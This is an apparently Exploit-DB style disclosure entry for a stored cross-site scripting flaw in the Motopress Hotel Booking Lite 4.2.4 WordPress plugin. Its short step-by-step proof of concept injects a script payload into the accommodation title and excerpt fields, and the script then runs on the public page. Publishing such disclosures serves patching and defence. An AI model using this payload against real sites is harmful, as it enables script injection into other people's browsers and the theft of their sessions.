5012842b97
2 changes to exploits/shellcodes WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS) Confluence Data Center 7.18.0 - Remote Code Execution (RCE)
17 lines
No EOL
713 B
Text
17 lines
No EOL
713 B
Text
# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)
|
|
# Date: 2022-06-05
|
|
# Exploit Author: Sanjay Singh
|
|
# Vendor Homepage: https://motopress.com/
|
|
# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
|
|
# Version: 4.2.4
|
|
# Tested on: Windows/XAMPP
|
|
###########################################################################
|
|
PoC:
|
|
|
|
1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type
|
|
2. Click on "Add Accommodation Type".
|
|
3. Add title payload= "><script>alert("XSS")</script>
|
|
4. Excerpt input payload "><script>alert("XSS")</script>
|
|
5. Click publish.
|
|
6. Visit http://localhost/accommodations/
|
|
7. XSS payload execute. |